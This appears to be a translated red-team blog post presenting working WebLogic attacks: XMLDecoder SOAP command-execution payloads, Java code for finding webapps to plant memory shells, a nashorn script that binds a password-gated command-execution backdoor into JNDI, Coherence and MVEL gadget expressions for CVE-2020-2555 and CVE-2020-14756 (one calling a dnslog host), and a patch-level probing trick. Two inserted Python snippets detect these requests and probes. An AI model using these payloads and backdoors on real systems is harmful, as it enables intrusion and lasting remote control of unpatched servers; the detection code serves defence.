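WebLogic attack techniques you need to know before HW

Without further ado, straight to the payloads.

XMLDecoder deserialization vulnerability

Most publicly available exps have very limited functionality, such as echoing output, writing a shell, or a reverse shell. When writing a webshell they often cannot even find the right directory. Below I publish code, tested successfully on WebLogic 10/12, that obtains all of WebLogic's webapp applications. This code can of course also run in a T3 environment, and you can also use it to register a memory shell across webapps.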


    public List<WebAppServletContext> findAllContext() throws ClassNotFoundException, InvocationTargetException, IllegalAccessException, NoSuchMethodException, NoSuchFieldException {
        java.lang.reflect.Method m = Class.forName("weblogic.t3.srvr.ServerRuntime").getDeclaredMethod("theOne");
        m.setAccessible(true);
        ServerRuntime serverRuntime = (ServerRuntime) m.invoke(null);
        List<WebAppServletContext> list = new java.util.ArrayList();
        StringBuilder sb = new StringBuilder();
        for (weblogic.management.runtime.ApplicationRuntimeMBean applicationRuntime : serverRuntime.getApplicationRuntimes()) {
            java.lang.reflect.Field childrenF = applicationRuntime.getClass().getSuperclass().getDeclaredField("children");
            childrenF.setAccessible(true);
            java.util.HashSet set = (java.util.HashSet) childrenF.get(applicationRuntime);
            java.util.Iterator iterator = set.iterator();
            while (iterator.hasNext()) {
                Object key = iterator.next();
                if (key.getClass().getName().equals("weblogic.servlet.internal.WebAppRuntimeMBeanImpl")) {

                    Field contextF = key.getClass().getDeclaredField("context");
                    contextF.setAccessible(true);
                    WebAppServletContext context = (WebAppServletContext) contextF.get(key);
                    list.add(context);
                }
            }
        }
        return list;
    }

With this code, we can conveniently write a shell to WebLogic.

WebLogic 10 exploit

Command execution

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>[hex-encoded payload omitted]</string>
                </void>
                <void class="org.mozilla.classfile.DefiningClassLoader">
                    <void method="defineClass">
                        <string>unicodeSec.memshell</string>
                        <object idref="cls"></object>
                        <void method="newInstance">
                            <void method="listWebapp" id="proc">
                                <string>whoami</string>
                            </void>
                        </void>
                    </void>
                </void>
                <void class="java.lang.Thread" method="currentThread">
                    <void method="getCurrentWork">
                        <void method="getResponse">
                            <void method="getServletOutputStream">
                                <void method="writeStream">
                                    <object idref="proc"></object>
                                </void>
                                <void method="flush"/>
                            </void>
                            <void method="getWriter"><void method="write"><string></string></void></void>
                        </void>
                    </void>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

List applications

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
                <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>copy the content from above
</string>
                </void>
                <void class="org.mozilla.classfile.DefiningClassLoader">
                    <void method="defineClass">
                        <string>unicodeSec.memshell</string>
                        <object idref="cls"></object>
                        <void method="newInstance">
                            <void method="listWebapp" id="proc">
                                <string>whoami</string>
                            </void>
                        </void>
                    </void>
                </void>
                <void class="java.lang.Thread" method="currentThread">
                    <void method="getCurrentWork">
                        <void method="getResponse">
                            <void method="getServletOutputStream">
                                <void method="writeStream">
                                    <object idref="proc"></object>
                                </void>
                                <void method="flush"/>
                            </void>
                            <void method="getWriter"><void method="write"><string></string></void></void>
                        </void>
                    </void>
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

The result is as shown in the figure.

WebLogic 12 exp

Here I use Java to execute JS, which is simple, quick and efficient.

Command execution

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
               <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>0x6a617661782e7363726970742e536372697074456e67696e654d616e61676572</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="str1">
                                          <object idref="cls"></object>
</void>


<void class="weblogic.utils.Hex" method="fromHexString" id="cls1">
                    <string>0x6a73</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="str2">
                                          <object idref="cls1"></object>
</void>


               <void class="java.lang.Class" method="forName" id="sm">
                                           <object idref="str1"></object>
<void method="newInstance">
<void method="getEngineByName" id="engine">
                                           <object idref="str2"></object>
<void method="eval" id="echo">
<string>
var scanner = new java.util.Scanner(java.lang.Runtime.getRuntime().exec("id").getInputStream());var res = "";while (scanner.hasNextLine()){res = res + scanner.nextLine();}res
</string>
</void>
</void>
</void>
                </void>


            <void class="java.lang.Thread" method="currentThread">
                <void method="getCurrentWork" id="current_work">
                    <void method="getClass">
                        <void method="getDeclaredField">
                            <string>connectionHandler</string>
                                <void method="setAccessible"><boolean>true</boolean></void>
                            <void method="get">
                                <object idref="current_work"></object>
                                <void method="getServletRequest">
                                    <void method="getResponse">
                                        <void method="getServletOutputStream">
                                            <void method="writeStream">
                                                <object class="weblogic.xml.util.StringInputStream"><object idref="echo"></object></object>
                                                </void>
                                            <void method="flush"/>
                                            </void>
                                    <void method="getWriter"><void method="write"><string></string></void></void>
                                    </void>
                                </void>
                            </void>
                        </void>
                    </void>
                </void>
            </void>
</java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

List applications

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java>
               <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
                    <string>0x6a617661782e7363726970742e536372697074456e67696e654d616e61676572</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="str1">
                                          <object idref="cls"></object>
</void>


<void class="weblogic.utils.Hex" method="fromHexString" id="cls1">
                    <string>0x6a73</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="str2">
                                          <object idref="cls1"></object>
</void>


<void class="weblogic.utils.Hex" method="fromHexString" id="jsHex">
                    <string>[hex-encoded payload omitted]</string>
                </void>
<void class="org.apache.commons.io.IOUtils" method="toString" id="js">
                                          <object idref="jsHex"></object>
</void>


               <void class="java.lang.Class" method="forName" id="sm">
                                           <object idref="str1"></object>
<void method="newInstance">
<void method="getEngineByName" id="engine">
                                           <object idref="str2"></object>
<void method="eval" id="echo">
                                         <object idref="js"></object>
</void>
</void>
</void>
                </void>


            <void class="java.lang.Thread" method="currentThread">
                <void method="getCurrentWork" id="current_work">
                    <void method="getClass">
                        <void method="getDeclaredField">
                            <string>connectionHandler</string>
                                <void method="setAccessible"><boolean>true</boolean></void>
                            <void method="get">
                                <object idref="current_work"></object>
                                <void method="getServletRequest">
                                    <void method="getResponse">
                                        <void method="getServletOutputStream">
                                            <void method="writeStream">
                                                <object class="weblogic.xml.util.StringInputStream"><object idref="echo"></object></object>
                                                </void>
                                            <void method="flush"/>
                                            </void>
                                    <void method="getWriter"><void method="write"><string></string></void></void>
                                    </void>
                                </void>
                            </void>
                        </void>
                    </void>
                </void>
            </void>


</java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>
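
Seen from the receiving side, the requests above share one shape: a `<java>` element inside the `WorkContext` SOAP header whose children instantiate classes and call methods. The following check for that shape is an added example, not code from the original post; the function names, the `ACTIVE_TAGS` set and the sample request (abridged from the WebLogic 10 request above, hex cut down to a class-file header) are assumptions made for the illustration.

```python
import xml.etree.ElementTree as ET

WORKAREA_NS = "http://bea.com/2004/06/soap/workarea/"  # namespace of the WorkContext header
# Assumption for this example: XMLDecoder elements that create objects or call methods.
ACTIVE_TAGS = {"object", "void", "new", "method", "array", "class"}
CLASS_MAGIC = "cafebabe"  # first four bytes of every Java class file


def _local(tag):
    """Drop the '{namespace}' prefix ElementTree adds to qualified names."""
    return tag.rsplit("}", 1)[-1]


def _add(seq, value):
    """Append value once, keeping first-seen order."""
    if value and value not in seq:
        seq.append(value)


def inspect_soap_request(body):
    """Report XMLDecoder activity found in the WorkContext header of a SOAP request."""
    report = {"suspicious": False, "error": None,
              "reasons": [], "classes": [], "methods": []}
    lowered = body.lower()
    if "<!doctype" in lowered or "<!entity" in lowered:
        # Do not parse DTDs: keeps entity-expansion tricks away from the scanner itself.
        report["suspicious"] = True
        report["reasons"].append("DTD or entity declaration in request")
        return report
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        report["error"] = "unparseable XML: %s" % exc
        return report

    # Namespace URIs are matched, so renaming the 'work:' prefix does not evade the check.
    for ctx in root.iter("{%s}WorkContext" % WORKAREA_NS):
        for java in ctx.iter():
            if _local(java.tag) != "java":
                continue
            for el in java.iter():
                name = _local(el.tag)
                if name in ACTIVE_TAGS:
                    _add(report["classes"], el.get("class"))
                    _add(report["methods"], el.get("method"))
                    _add(report["reasons"],
                         "XMLDecoder <%s> element in WorkContext" % name)
                elif name == "string":
                    text = (el.text or "").strip().lower()
                    if text.startswith("0x"):
                        text = text[2:]
                    if text.startswith(CLASS_MAGIC):
                        _add(report["reasons"],
                             "hex-encoded Java class file in <string>")
    report["suspicious"] = bool(report["reasons"])
    return report


# Constructed sample: structure taken from the article, payload reduced to a stub.
SAMPLE_FLAGGED = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <void class="weblogic.utils.Hex" method="fromHexString" id="cls">
          <string>0xcafebabe00000032</string>
        </void>
        <void class="org.mozilla.classfile.DefiningClassLoader">
          <void method="defineClass"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

# Constructed sample: an ordinary SOAP call without a WorkContext header.
SAMPLE_CLEAN = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body><getStatus xmlns="urn:example"/></soapenv:Body>
</soapenv:Envelope>"""

if __name__ == "__main__":
    for label, sample in (("flagged", SAMPLE_FLAGGED), ("clean", SAMPLE_CLEAN)):
        print(label, inspect_soap_request(sample))
```
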

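T3 deserialization

WebLogic T3 deserialization vulnerabilities never go out of fashion; there are always fools who don't patch. Below I introduce how to attack over T3.

1. Detecting the vulnerability

The tools from the experts online are all awesome. But there is one problem: when it comes to detecting the vulnerability, people don't seem to handle it very smoothly. The common approach is to hit dnslog once and check the dnslog records to determine whether the target is vulnerable. Here I introduce a simpler method for detecting the vulnerability, applicable to WebLogic 10/12.

The WebLogic codebase feature, simply put: for RMI protocols such as T3/IIOP, when certain classes are deserialized and the class does not exist on the current system, the class is downloaded from the peer's codebase address and loaded. Yes, you heard that right. Thinking a bit more broadly: what if the class we download is one of WebLogic's own? So we can download WebLogic's blacklist and decompile it to see which patches the target WebLogic has applied.

Request URL: http://xx:8091/bea_wls_internal/classes/weblogic/utils/io/oif/WebLogicFilterConfig.class

Put the downloaded file into a Java decompiler to learn whether the target has been patched. Of course, this trick can also be used to check for WebLogic XMLDecoder deserialization, except that the request path is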

http://192.168.119.130:8088//bea_wls_internal/classes/weblogic/wsee/workarea/WorkContextXmlInputAdapter.class
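
These class downloads are plain HTTP GETs, so they show up in the server's access log. The scan below is an added example, not part of the original post: it assumes Common Log Format lines, the log entries and client addresses are constructed, and the function names are hypothetical. It normalizes each request target first, because the second URL above uses a leading `//` and a naive prefix match would miss it.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+')

CODEBASE_PREFIX = "/bea_wls_internal/classes/"  # path shown in the article
# The two classes the article downloads to read the patch state.
PATCH_STATE_CLASSES = {
    "weblogic.utils.io.oif.WebLogicFilterConfig",
    "weblogic.wsee.workarea.WorkContextXmlInputAdapter",
}


def normalize_path(target):
    """Drop query/fragment, percent-decode once, collapse '//' and dot segments.

    urllib's urlsplit() is avoided on purpose: it would read a target that
    starts with '//' as a host name and lose the first path segment.
    """
    path = target.split("?", 1)[0].split("#", 1)[0]
    path = unquote(path)
    path = re.sub(r"/{2,}", "/", path)  # normpath alone keeps a leading '//'
    return posixpath.normpath(path)


def find_codebase_fetches(log_lines):
    """Return {client: [(time, class_name, status), ...]} for class downloads."""
    hits = defaultdict(list)
    for line in log_lines:
        m = CLF.match(line)
        if not m:
            continue
        path = normalize_path(m["target"])
        if not (path.startswith(CODEBASE_PREFIX) and path.endswith(".class")):
            continue
        cls = path[len(CODEBASE_PREFIX):-len(".class")].replace("/", ".")
        hits[m["host"]].append((m["time"], cls, int(m["status"])))
    return dict(hits)


def patch_level_probes(hits):
    """Clients that were actually served (HTTP 200) a patch-state class."""
    return sorted(
        host for host, rows in hits.items()
        if any(cls in PATCH_STATE_CLASSES and status == 200
               for _, cls, status in rows)
    )


# Constructed log lines (documentation address ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2021:10:15:32 +0800] "GET /bea_wls_internal/classes/'
    'weblogic/utils/io/oif/WebLogicFilterConfig.class HTTP/1.1" 200 4312',
    '198.51.100.7 - - [12/Mar/2021:10:15:40 +0800] "GET //bea_wls_internal/classes/'
    'weblogic/wsee/workarea/WorkContextXmlInputAdapter.class HTTP/1.1" 200 2876',
    '203.0.113.9 - - [12/Mar/2021:11:02:01 +0800] "GET /bea_wls_internal/classes/'
    '%77eblogic/utils/io/oif/WebLogicFilterConfig.class?x=1 HTTP/1.1" 404 1164',
    '192.0.2.10 - - [12/Mar/2021:11:05:17 +0800] "GET /console/login/LoginForm.jsp '
    'HTTP/1.1" 200 3021',
]

if __name__ == "__main__":
    found = find_codebase_fetches(SAMPLE_LOG)
    for host, rows in found.items():
        for when, cls, status in rows:
            print(host, when, status, cls)
    print("served patch-state classes to:", patch_level_probes(found))
```
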

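2. Exploitation

Here I recommend a WebLogic exploitation tool, r4v3zn's weblogic-framework. Of course it has a few small bugs, but it is a very handy tool.

Of course this part is mainly for red-team developers. We know that in the chained execution of the cve-2020-2555 gadget, it is hard to achieve arbitrary code execution. At present most methods upload a jar, or use URLClassLoader to load a remote malicious jar, to achieve arbitrary code execution.

But we can use Java's built-in JS engine to execute arbitrary JS code, and this feature has been supported since Java 1.6. In other words, this applies to the vast majority of WebLogic targets.

Java's built-in JS engine is called nashorn and supports calling arbitrary Java methods. But JS is a weakly typed language, and in some scenarios debugging may be needed to avoid bugs caused by automatic type conversion.

So I implemented JS that calls javassist to dynamically assemble a ClusterMasterRemote class and plant it into WebLogic's JNDI instance. Without further ado, here is the code.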

print('Powered by 蛋黄!');
var ClassPool = Java.type('javassist.ClassPool');
var CtField = Java.type('javassist.CtField');
var CtClass = Java.type('javassist.CtClass');
var Modifier = Java.type('javassist.Modifier')
var CtConstructor = Java.type('javassist.CtConstructor')
var CtMethod = Java.type('javassist.CtMethod')

var pool = ClassPool.getDefault();

var cc = pool.makeClass("org.unicodesec.RemoteImpl");
cc.addInterface(pool.get("weblogic.cluster.singleton.ClusterMasterRemote"));
var param = new CtField(pool.get("java.lang.String"), "bindName", cc);
param.setModifiers(Modifier.PRIVATE);
cc.addField(param, CtField.Initializer.constant("unicodeSec"));

var cons = new CtConstructor(null, cc);
cons.setBody("{javax.naming.Context ctx = new javax.naming.InitialContext();\n" +
    "ctx.rebind(bindName, this);\n" +
    "System.out.println(\"installed\");}");

cc.addConstructor(cons);
var setServerLocationM = new CtMethod(CtClass.voidType, "setServerLocation", [pool.get("java.lang.String"), pool.get("java.lang.String")], cc);
setServerLocationM.setExceptionTypes([pool.get("java.rmi.RemoteException")]);
cc.addMethod(setServerLocationM);

var getServerLocationM = new CtMethod(pool.get("java.lang.String"), "getServerLocation", [pool.get("java.lang.String")], cc);
getServerLocationM.setExceptionTypes([pool.get("java.rmi.RemoteException")]);
getServerLocationM.setBody("{try {\n" +
    "            String cmd = $1;\n" +
    "            if (!cmd.startsWith(\"showmecode\")) {\n" +
    "                return \"guess me?\";\n" +
    "            } else {\n" +
    "                cmd = cmd.substring(10);\n" +
    "            }\n" +
    "\n" +
    "            boolean isLinux = true;\n" +
    "            String osTyp = System.getProperty(\"os.name\");\n" +
    "            if (osTyp != null && osTyp.toLowerCase().contains(\"win\")) {\n" +
    "                isLinux = false;\n" +
    "            }\n" +
    "            java.util.List cmds = new java.util.ArrayList();\n" +
    "\n" +
    "            if (cmd.startsWith(\"$NO$\")) {\n" +
    "                cmds.add(cmd.substring(4));\n" +
    "            } else if (isLinux) {\n" +
    "                cmds.add(\"/bin/bash\");\n" +
    "                cmds.add(\"-c\");\n" +
    "                cmds.add(cmd);\n" +
    "            } else {\n" +
    "                cmds.add(\"cmd.exe\");\n" +
    "                cmds.add(\"/c\");\n" +
    "                cmds.add(cmd);\n" +
    "            }\n" +
    "\n" +
    "            ProcessBuilder processBuilder = new ProcessBuilder(cmds);\n" +
    "            processBuilder.redirectErrorStream(true);\n" +
    "            Process proc = processBuilder.start();\n" +
    "\n" +
    "            java.io.BufferedReader br = new java.io.BufferedReader(new java.io.InputStreamReader(proc.getInputStream()));\n" +
    "            StringBuffer sb = new StringBuffer();\n" +
    "\n" +
    "            String line;\n" +
    "            while ((line = br.readLine()) != null) {\n" +
    "                sb.append(line).append(\"\\n\");\n" +
    "            }\n" +
    "\n" +
    "            return sb.toString();\n" +
    "        } catch (Exception e) {\n" +
    "            return e.getMessage();\n" +
    "        }}");
cc.addMethod(getServerLocationM);
cc.setModifiers(Modifier.PUBLIC);
cc.toClass().newInstance();

Of course, the coherence gadget needs to be changed as follows

    private static ChainedExtractor getChainedExtractor() {
        return new ChainedExtractor(new ReflectionExtractor[]{
                new ReflectionExtractor(
                        "newInstance", new Object[]{}
                ),
                new ReflectionExtractor(
                        "getEngineByName", new Object[]{"nashorn"}
                ),
                new ReflectionExtractor(
                        "eval", new Object[]{getJsCode()}
                )

        });
    }

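3. WebLogic echo

There are two common approaches to WebLogic echo; dnslog is not discussed here. Since a T3 connection has already been established directly, using dnslog to send back the command execution result is just pointless extra work.

3.1 JNDI instance

This method uses the arbitrary code execution gained through deserialization to plant a JNDI instance in the target WebLogic, then calls the JNDI instance to obtain the command execution result.

3.2 Error-based echo

Compared with the IIOP protocol, T3 can transmit T3 protocol errors on the server to the client through deserialization so that the client can evaluate them. We can control the error message to transmit the command execution result to the client.

4. cve-2020-14756 in practice

Here we do not discuss the vulnerability's principle or analysis; we only discuss exploitation.

4.1 MVEL expression error-based echo

Principle: this relies on the error raised by URLClassLoader's loadClass. If the class being looked up does not exist in the system, the class name is displayed. So we can construct the following MVEL expression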

new MvelExtractor("new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(\"http://2e1n60.dnslog.cn:10000\")}).loadClass(System.getProperty(\"java.version\"));");

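Loading a jar that does not exist naturally raises an error, roughly as follows

4.2 Planting a JNDI instance

We need to plant a stable backdoor; here I choose to plant a JNDI instance. Of course, when MVEL executes JS, it runs into string-escaping problems. We avoid this by loading the code base64-encoded; the MVEL expression is as follows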

new MvelExtractor(String.format("new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(new java.lang.String(java.util.Base64.getDecoder().decode(\"%s\"), \"utf-8\"));", x))

Of course, I have also converted the other vulnerabilities to JS code; the tool will be released for download before HW.